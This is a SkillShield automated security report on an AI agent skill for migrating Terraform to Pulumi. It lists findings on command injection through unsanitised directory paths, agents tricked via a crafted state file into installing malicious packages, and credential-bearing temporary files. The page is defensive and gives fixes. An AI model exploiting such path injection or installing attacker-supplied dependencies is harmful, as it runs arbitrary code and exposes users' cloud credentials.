Trust Assessment
pulumi-terraform-to-pulumi received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Command Injection via User-Controlled Paths, Command Injection via User-Controlled Paths in Plugin Execution, Supply Chain Risk via Dynamically Installed Dependencies.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 18/100, indicating areas for improvement.
Last analyzed on April 1, 2026 (commit bbf441e6). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Command Injection via User-Controlled Paths The skill instructs the agent to construct and execute shell commands using user-provided directory paths (`${terraform_dir}` and `${pulumi_dir}`) without apparent sanitization. A malicious user could inject arbitrary shell commands by providing specially crafted paths, leading to remote code execution within the agent's environment. Implement strict input validation and sanitization for all user-provided paths. Paths should be validated against a whitelist of allowed characters or a strict regex for valid directory names. When used in shell commands, paths should be properly quoted and escaped to prevent command injection (e.g., using `shlex.quote` in Python or similar language-specific mechanisms). | LLM | SKILL.md:20 | |
| CRITICAL | Command Injection via User-Controlled Paths in Plugin Execution Similar to the previous finding, the skill uses user-controlled directory paths (`${terraform_dir}` and `${pulumi_dir}`) directly in the `pulumi plugin run terraform-migrate` command. This presents another critical command injection vulnerability, allowing a malicious user to execute arbitrary commands by manipulating the input paths. Implement strict input validation and sanitization for all user-provided paths. Paths should be validated against a whitelist of allowed characters or a strict regex for valid directory names. When used in shell commands, paths should be properly quoted and escaped to prevent command injection (e.g., using `shlex.quote` in Python or similar language-specific mechanisms). | LLM | SKILL.md:25 | |
| HIGH | Supply Chain Risk via Dynamically Installed Dependencies The skill instructs the agent to install package dependencies (e.g., `npm install`, `pip install`) based on provider names and versions read from a dynamically generated JSON file (`/tmp/required-providers.json`). This file is produced by the `pulumi plugin run terraform-migrate` command. If the `terraform-migrate` plugin is compromised, or if a malicious Terraform state file can be crafted to inject arbitrary package names or versions into `/tmp/required-providers.json`, the agent could be tricked into installing malicious software from public package registries. Implement robust validation of package names and versions read from `/tmp/required-providers.json` before executing installation commands. Consider whitelisting allowed provider names and/or verifying package integrity (e.g., via checksums or trusted registries). Ensure the `terraform-migrate` plugin is from a trusted source and its integrity is verified. | LLM | SKILL.md:38 | |
| MEDIUM | Sensitive Data Exposure via Temporary Files The skill instructs the agent to create local files containing sensitive information: `terraform.tfstate` (from `terraform state pull`) and `/tmp/pulumi-state.json` (translated Pulumi state). These files can contain cloud provider credentials, API keys, and other secrets. While necessary for the migration process, the skill does not include instructions for securely handling, restricting access to, or promptly deleting these files after use. This creates a risk of sensitive data exposure if the agent's execution environment is compromised or if the files persist longer than necessary. Add explicit instructions for the agent to securely handle these temporary files. This should include: 1) Setting appropriate file permissions to restrict access, 2) Deleting the files immediately after their contents have been processed and are no longer needed, and 3) Considering in-memory processing where feasible to avoid writing sensitive data to disk. | LLM | SKILL.md:20 |
Scan History
Embed Code
[](https://skillshield.io/report/faee9bd9bb2c961e)
Powered by SkillShield